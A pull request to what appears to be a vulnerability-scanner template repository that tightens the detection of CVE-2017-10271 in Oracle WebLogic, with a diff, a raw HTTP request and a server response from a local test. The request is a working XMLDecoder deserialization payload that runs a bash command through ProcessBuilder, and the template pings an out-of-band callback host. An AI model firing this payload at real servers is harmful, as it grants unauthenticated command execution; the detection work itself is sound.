### PR TITLE
Fix false postive CVE-2017-10271

### DIFF
--- a/cves/2017/CVE-2017-10271.yaml
+++ b/cves/2017/CVE-2017-10271.yaml
@@ -42,7 +42,7 @@ requests:
                                     <string>-c</string>
                                 </void>
                                 <void index="2">
-                                    <string>interact.sh</string>
+                                    <string>ping -c 1 {{interactsh-url}}</string>
                                 </void>
                             </array>
                             <void method="start"/></void>
@@ -86,6 +86,7 @@ requests:
       - type: dsl
         dsl:
           - regex("<faultstring>java.lang.ProcessBuilder || <faultstring>0", body)
+          - contains(interactsh_protocol, "dns")
           - status_code == 500
         condition: and
 

--- a/cves/2017/CVE-2017-10271.yaml
+++ b/cves/2017/CVE-2017-10271.yaml
@@ -2,7 +2,7 @@ id: CVE-2017-10271
 
 info:
   name: Oracle WebLogic Server - Remote Command Execution
-  author: dr_set,ImNightmaree
+  author: dr_set,ImNightmaree,true13
   severity: high
   description: |
     The Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent - WLS Security) is susceptible to remote command execution. Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0 and 12.2.1.2.0. This easily exploitable vulnerability allows unauthenticated attackers with network access via T3 to compromise Oracle WebLogic Server.
@@ -85,7 +85,7 @@ requests:
     matchers:
       - type: dsl
         dsl:
-          - regex("<faultstring>.*</faultstring>", body)
+          - regex("<faultstring>java.lang.ProcessBuilder || <faultstring>0", body)
           - status_code == 500
         condition: and
 


### PR DESCRIPTION
### Template / PR Information

<!-- Explains the information and/or motivation for update or/ creating this templates -->
<!-- Please include any reference to your template if available -->

- Fixed CVE-2017-10271
- References
  - [PoC] https://github.com/rabbitmask/WeblogicScan 
  - [docker environment] https://github.com/kkirsche/CVE-2017-10271

### Template Validation

I've validated this template locally?
- [X] YES
- [ ] NO

```

POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Connection: close
Content-Length: 1007
Accept: */*
Accept-Language: en
Content-Type: text/xml
Accept-Encoding: gzip

<?xml version="1.0" encoding="utf-8"?>
<soapenv:Envelope
    xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
    <soapenv:Header>
        <work:WorkContext
            xmlns:work="http://bea.com/2004/06/soap/workarea/">
            <java version="1.4.0" class="java.beans.XMLDecoder">
                <void class="java.lang.ProcessBuilder">
                    <array class="java.lang.String" length="3">
                        <void index="0">
                            <string>/bin/bash</string>
                        </void>
                        <void index="1">
                            <string>-c</string>
                        </void>
                        <void index="2">
                            <string>interact.sh</string>
                        </void>
                    </array>
                    <void method="start"/></void>
            </java>
        </work:WorkContext>
    </soapenv:Header>
    <soapenv:Body/>
</soapenv:Envelope>
[DBG] [CVE-2017-10271] Dumped HTTP response http://127.0.0.1/wls-wsat/CoordinatorPortType

HTTP/1.1 500 Internal Server Error
Connection: close
Transfer-Encoding: chunked
Content-Type: text/xml; charset=utf-8
Date: Sat, 20 Aug 2022 05:30:39 GMT
X-Powered-By: Servlet/2.5 JSP/2.1

<?xml version='1.0' encoding='UTF-8'?><S:Envelope xmlns:S="http://schemas.xmlsoap.org/soap/envelope/"><S:Body><S:Fault xmlns:ns4="http://www.w3.org/2003/05/soap-envelope"><faultcode>S:Server</faultcode><faultstring>0</faultstring><detail><ns2:exception xmlns:ns2="http://jax-ws.dev.java.net/" class="java.lang.ArrayIndexOutOfBoundsException" note="To disable this feature, set com.sun.xml.ws.fault.SOAPFaultBuilder.disableCaptureStackTrace system property to false"><message>0</message><ns2:stackTrace><ns2:frame class="com.sun.beans.ObjectHandler" file="ObjectHandler.java" line="139" method="dequeueResult"/><ns2:frame class="java.beans.XMLDecoder" file="XMLDecoder.java" line="206" method="readObject"/><ns2:frame class="weblogic.wsee.workarea.WorkContextXmlInputAdapter" file="WorkContextXmlInputAdapter.java" line="111" method="readUTF"/><ns2:frame class="weblogic.workarea.spi.WorkContextEntryImpl" file="WorkContextEntryImpl.java" line="92" method="readEntry"/><ns2:frame class="weblogic.workarea.WorkContextLocalMap" file="WorkContextLocalMap.java" line="179" method="receiveRequest"/><ns2:frame class="weblogic.workarea.WorkContextMapImpl" file="WorkContextMapImpl.java" line="163" method="receiveRequest"/><ns2:frame class="weblogic.wsee.jaxws.workcontext.WorkContextServerTube" file="WorkContextServerTube.java" line="71" method="receive"/><ns2:frame class="weblogic.wsee.jaxws.workcontext.WorkContextTube" file="WorkContextTube.java" line="107" method="readHeaderOld"/><ns2:frame class="weblogic.wsee.jaxws.workcontext.WorkContextServerTube" file="WorkContextServerTube.java" line="43" method="processRequest"/><ns2:frame class="com.sun.xml.ws.api.pipe.Fiber" file="Fiber.java" line="866" method="__doRun"/><ns2:frame class="com.sun.xml.ws.api.pipe.Fiber" file="Fiber.java" line="815" method="_doRun"/><ns2:frame class="com.sun.xml.ws.api.pipe.Fiber" file="Fiber.java" line="778" method="doRun"/><ns2:frame class="com.sun.xml.ws.api.pipe.Fiber" file="Fiber.java" line="680" method="runSync"/><ns2:frame class="com.sun.xml.ws.server.WSEndpointImpl$2" file="WSEndpointImpl.java" line="403" method="process"/><ns2:frame class="com.sun.xml.ws.transport.http.HttpAdapter$HttpToolkit" file="HttpAdapter.java" line="539" method="handle"/><ns2:frame class="com.sun.xml.ws.transport.http.HttpAdapter" file="HttpAdapter.java" line="253" method="handle"/><ns2:frame class="com.sun.xml.ws.transport.http.servlet.ServletAdapter" file="ServletAdapter.java" line="140" method="handle"/><ns2:frame class="weblogic.wsee.jaxws.WLSServletAdapter" file="WLSServletAdapter.java" line="171" method="handle"/><ns2:frame class="weblogic.wsee.jaxws.HttpServletAdapter$AuthorizedInvoke" file="HttpServletAdapter.java" line="708" method="run"/><ns2:frame class="weblogic.security.acl.internal.AuthenticatedSubject" file="AuthenticatedSubject.java" line="363" method="doAs"/><ns2:frame class="weblogic.security.service.SecurityManager" file="SecurityManager.java" line="146" method="runAs"/><ns2:frame class="weblogic.wsee.util.ServerSecurityHelper" file="ServerSecurityHelper.java" line="103" method="authenticatedInvoke"/><ns2:frame class="weblogic.wsee.jaxws.HttpServletAdapter$3" file="HttpServletAdapter.java" line="311" method="run"/><ns2:frame class="weblogic.wsee.jaxws.HttpServletAdapter" file="HttpServletAdapter.java" line="336" method="post"/><ns2:frame class="weblogic.wsee.jaxws.JAXWSServlet" file="JAXWSServlet.java" line="99" method="doRequest"/><ns2:frame class="weblogic.servlet.http.AbstractAsyncServlet" file="AbstractAsyncServlet.java" line="99" method="service"/><ns2:frame class="javax.servlet.http.HttpServlet" file="HttpServlet.java" line="820" method="service"/><ns2:frame class="weblogic.servlet.internal.StubSecurityHelper$ServletServiceAction" file="StubSecurityHelper.java" line="227" method="run"/><ns2:frame class="weblogic.servlet.internal.StubSecurityHelper" file="StubSecurityHelper.java" line="125" method="invokeServlet"/><ns2:frame class="weblogic.servlet.internal.ServletStubImpl" file="ServletStubImpl.java" line="301" method="execute"/><ns2:frame class="weblogic.servlet.internal.ServletStubImpl" file="ServletStubImpl.java" line="184" method="execute"/><ns2:frame class="weblogic.servlet.internal.WebAppServletContext$ServletInvocationAction" file="WebAppServletContext.java" line="3732" method="wrapRun"/><ns2:frame class="weblogic.servlet.internal.WebAppServletContext$ServletInvocationAction" file="WebAppServletContext.java" line="3696" method="run"/><ns2:frame class="weblogic.security.acl.internal.AuthenticatedSubject" file="AuthenticatedSubject.java" line="321" method="doAs"/><ns2:frame class="weblogic.security.service.SecurityManager" file="SecurityManager.java" line="120" method="runAs"/><ns2:frame class="weblogic.servlet.internal.WebAppServletContext" file="WebAppServletContext.java" line="2273" method="securedExecute"/><ns2:frame class="weblogic.servlet.internal.WebAppServletContext" file="WebAppServletContext.java" line="2179" method="execute"/><ns2:frame class="weblogic.servlet.internal.ServletRequestImpl" file="ServletRequestImpl.java" line="1490" method="run"/><ns2:frame class="weblogic.work.ExecuteThread" file="ExecuteThread.java" line="256" method="execute"/><ns2:frame class="weblogic.work.ExecuteThread" file="ExecuteThread.java" line="221" method="run"/></ns2:stackTrace></ns2:exception></detail></S:Fault></S:Body></S:Envelope>
[2022-08-20 14:30:39] [CVE-2017-10271:dsl-1] [http] [high] http://127.0.0.1/wls-wsat/CoordinatorPortType
```